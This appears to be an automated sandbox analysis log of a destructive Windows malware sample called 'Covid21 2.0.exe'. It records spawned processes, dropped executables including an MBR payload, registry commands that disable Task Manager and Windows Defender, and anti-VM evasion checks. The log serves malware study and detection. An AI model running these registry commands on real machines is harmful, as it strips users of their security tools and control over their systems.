Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript prompt.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe clwcp c:\covid21\covid.jpg
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\x.vbs'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K coronaloop.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\covid21\Corona.exe c:\covid21\corona.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe inv.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe z.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\2870.tmp\mlt.exe mlt.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\2870.tmp\icons.exe icons.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\icons.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe screenscrew.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs'
Source: C:\Users\user\Desktop\Covid21 2.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\2870.tmp\Covid21.bat' '
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript prompt.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe clwcp c:\covid21\covid.jpg
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\x.vbs'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K coronaloop.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe inv.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe z.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\2870.tmp\mlt.exe mlt.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\2870.tmp\icons.exe icons.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe screenscrew.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\covid21\Corona.exe c:\covid21\corona.exe

Source: C:\Users\user\Desktop\Covid21 2.0.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Windows\SysWOW64\wscript.exe	Automated click: OK
Source: C:\Windows\SysWOW64\wscript.exe	Automated click: OK
Source: C:\Windows\SysWOW64\wscript.exe	Automated click: OK
Source: C:\Windows\SysWOW64\wscript.exe	Automated click: OK
Source: C:\Windows\SysWOW64\wscript.exe	Automated click: OK
Source: C:\Windows\SysWOW64\wscript.exe	Automated click: OK
Source: C:\Windows\SysWOW64\wscript.exe	Automated click: OK
Source: C:\Windows\SysWOW64\wscript.exe	Automated click: OK
Source: C:\Windows\SysWOW64\wscript.exe	Automated click: OK
Source: C:\Windows\SysWOW64\wscript.exe	Automated click: OK
Source: C:\Windows\SysWOW64\wscript.exe	Automated click: OK
Source: C:\Windows\SysWOW64\wscript.exe	Automated click: OK
Source: C:\Windows\SysWOW64\wscript.exe	Automated click: OK
Source: C:\Windows\SysWOW64\wscript.exe	Automated click: OK
Source: C:\Windows\SysWOW64\wscript.exe	Automated click: OK
Source: C:\Windows\SysWOW64\wscript.exe	Automated click: OK
Source: C:\Windows\SysWOW64\wscript.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Covid21 2.0.exe

Static file information: File size 1210880 > 1048576

Source: C:\Users\user\Desktop\Covid21 2.0.exe

Code function: 0_2_00405EB2 GetTempPathA,LoadLibraryA,GetProcAddress,GetLongPathNameA,FreeLibrary,

Source: C:\Users\user\Desktop\Covid21 2.0.exe	Code function: 0_2_00478069 push 004112A1h; ret
Source: C:\Users\user\Desktop\Covid21 2.0.exe	Code function: 0_2_004780BA push 004112D8h; ret
Source: C:\Users\user\Desktop\Covid21 2.0.exe	Code function: 0_2_004775D7 push 0041083Ah; ret
Source: C:\Users\user\Desktop\Covid21 2.0.exe	Code function: 0_2_00477651 push 004108E4h; ret
Source: C:\Users\user\Desktop\Covid21 2.0.exe	Code function: 0_2_004776FB push 00410A14h; ret
Source: C:\Users\user\Desktop\Covid21 2.0.exe	Code function: 0_2_0046DAD9 push 00406CF0h; ret
Source: C:\Users\user\Desktop\Covid21 2.0.exe	Code function: 0_2_0046CB59 push 00405D95h; ret
Source: C:\Users\user\Desktop\Covid21 2.0.exe	Code function: 0_2_00473B01 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\Desktop\Covid21 2.0.exe	Code function: 0_2_0046DB11 push 00407000h; ret
Source: C:\Users\user\Desktop\Covid21 2.0.exe	Code function: 0_2_0046CD7D push 00405F94h; ret
Source: C:\Users\user\Desktop\Covid21 2.0.exe	Code function: 0_2_00469DB9 push eax; ret
Source: C:\Users\user\Desktop\Covid21 2.0.exe	Code function: 0_2_0046CE0D push 00406024h; ret
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_00441090 push 0044111Dh; ret
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_0040D62C push 0040D69Bh; ret
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_00405D44 push 00405D95h; ret
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_00442080 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_004162B8 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_0044237C push 004423A8h; ret
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_0044A328 push 0044A393h; ret
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_00428488 push 004284CAh; ret
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_0042E5E8 push 0042E614h; ret
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_0042E63C push 0042E668h; ret
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_004107C2 push 0041083Ah; ret
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_004107C4 push 0041083Ah; ret
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_0042C844 push 0042C870h; ret
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_0042C87C push 0042C8A8h; ret
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_0042C80C push 0042C838h; ret
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_0041083C push 004108E4h; ret
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_004108E6 push 00410A14h; ret
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_0042C8EC push 0042C918h; ret
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_0042C8B4 push 0042C8E0h; ret

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior:

Command shell drops VBS files

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\2870.tmp\x.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\2870.tmp\t.vbs	Jump to behavior

Uses cmd line tools excessively to alter registry or file data

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe

Source: C:\Users\user\Desktop\Covid21 2.0.exe	File created: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Covid21 2.0.exe	File created: C:\Users\user\AppData\Local\Temp\2870.tmp\Corona.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Covid21 2.0.exe	File created: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Covid21 2.0.exe	File created: C:\Users\user\AppData\Local\Temp\2870.tmp\PayloadMBR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Covid21 2.0.exe	File created: C:\Users\user\AppData\Local\Temp\2870.tmp\mlt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Covid21 2.0.exe	File created: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Covid21 2.0.exe	File created: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\covid21\Corona.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Covid21 2.0.exe	File created: C:\Users\user\AppData\Local\Temp\2870.tmp\icons.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_004554C4 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_00452098 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_0043AB48 IsIconic,GetCapture,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_0043B440 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_00425458 IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_00455BEC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_00455CB0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_0043BD64 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
Source: C:\covid21\Corona.exe	Code function: 12_2_0044CF30 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
Source: C:\covid21\Corona.exe	Code function: 12_2_00449F58 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
Source: C:\covid21\Corona.exe	Code function: 12_2_0043402C IsIconic,GetCapture,
Source: C:\covid21\Corona.exe	Code function: 12_2_004348E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
Source: C:\covid21\Corona.exe	Code function: 12_2_00435160 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
Source: C:\covid21\Corona.exe	Code function: 12_2_0044D650 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
Source: C:\covid21\Corona.exe	Code function: 12_2_0044D700 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
Source: C:\covid21\Corona.exe	Code function: 12_2_0042397C MonitorFromWindow,MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: 13_2_0044A498 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: 13_2_00432810 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: 13_2_0044ABB8 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: 13_2_0044AC68 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: 13_2_004474C0 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: 13_2_004316DC IsIconic,GetCapture,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: 13_2_00421D38 IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: 13_2_00431F90 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0043A0D6 GetForegroundWindow,IsWindowVisible,GetWindowThreadProcessId,IsZoomed,IsIconic,GetWindowLongA,GetModuleHandleA,GetProcAddress,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_004360F9 SetWindowTextA,IsZoomed,IsIconic,ShowWindow,IsIconic,GetWindowLongA,GetWindowLongA,GetWindowRect,MapWindowPoints,GetWindowLongA,GetWindowRect,GetWindowLongA,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongA,GetMenu,GetWindowLongA,AdjustWindowRectEx,SystemParametersInfoA,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetForegroundWindow,GetFocus,UpdateWindow,SetFocus,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_004360F9 SetWindowTextA,IsZoomed,IsIconic,ShowWindow,IsIconic,GetWindowLongA,GetWindowLongA,GetWindowRect,MapWindowPoints,GetWindowLongA,GetWindowRect,GetWindowLongA,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongA,GetMenu,GetWindowLongA,AdjustWindowRectEx,SystemParametersInfoA,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetForegroundWindow,GetFocus,UpdateWindow,SetFocus,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0043536F GetWindowLongA,GetWindowLongA,GetWindowLongA,_strlen,SetWindowPos,EnableWindow,IsWindowVisible,IsIconic,SetWindowLongA,SetWindowLongA,SetWindowLongA,SetWindowPos,ShowWindow,ShowWindow,ShowWindow,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0043C3F2 GetWindowThreadProcessId,GetWindowThreadProcessId,GetForegroundWindow,FindWindowA,IsIconic,ShowWindow,AttachThreadInput,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,BringWindowToTop,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00439C0E GetAsyncKeyState,GetForegroundWindow,IsIconic,GetWindowRect,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0044C66D SendMessageA,SendMessageA,SendMessageA,IsWindowVisible,ShowWindow,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,SendMessageA,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00431E81 SendMessageA,GetWindowLongA,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,SendMessageA,GetWindowLongA,ShowWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,PtInRect,SetFocus,SendMessageA,SetFocus,MapWindowPoints,InvalidateRect,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0042CF3C GetDC,SelectObject,GetTextMetricsA,GetSystemMetrics,GetDC,SelectObject,GetTextMetricsA,GetSystemMetrics,GetDC,SelectObject,GetTextMetricsA,GetSystemMetrics,DrawTextA,GetSystemMetrics,GetSystemMetrics,GetDC,SelectObject,GetTextMetricsA,GetSystemMetrics,IsWindowVisible,IsIconic,SendMessageA,GetWindowLongA,SendMessageA,CreateWindowExA,SetWindowLongA,SendMessageA,CreateWindowExA,GetWindowLongA,SendMessageA,SendMessageA,CreateWindowExA,CreateWindowExA,CreateWindowExA,SendMessageA,SendMessageA,CreateWindowExA,SendMessageA,SendMessageA,SendMessageA,GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageA,SelectObject,ReleaseDC,SendMessageA,SendMessageA,GetClientRect,SetWindowLongA,SendMessageA,SetWindowLongA,MoveWindow,GetWindowRect,SendMessageA,SetWindowPos,GetWindowRect,MapWindowPoints,InvalidateRect,SetWindowPos,SetWindowPos,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Code function: 37_2_00428FE4 PostMessageA,PostMessageA,SendMessageA,LoadLibraryA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Code function: 37_2_0041F210 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Code function: 37_2_0041E320 IsIconic,GetCapture,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Code function: 37_2_0041EABA IsIconic,SetWindowPos,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Code function: 37_2_0041EABC IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Code function: 37_2_004275F8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Code function: 37_2_00429678 IsIconic,SetActiveWindow,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Code function: 37_2_004296C0 IsIconic,SetActiveWindow,SetFocus,

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe

Code function: 6_2_00440A48 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,

Source: C:\Windows\SysWOW64\cmd.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\Covid21 2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Covid21 2.0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\covid21\Corona.exe	Code function: 12_2_004294BC
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: 13_2_00426D20

Source: C:\Windows\SysWOW64\cmd.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
Source: C:\covid21\Corona.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Users\user\Desktop\Covid21 2.0.exe

Window / User API: threadDelayed 1463

Source: C:\Users\user\Desktop\Covid21 2.0.exe

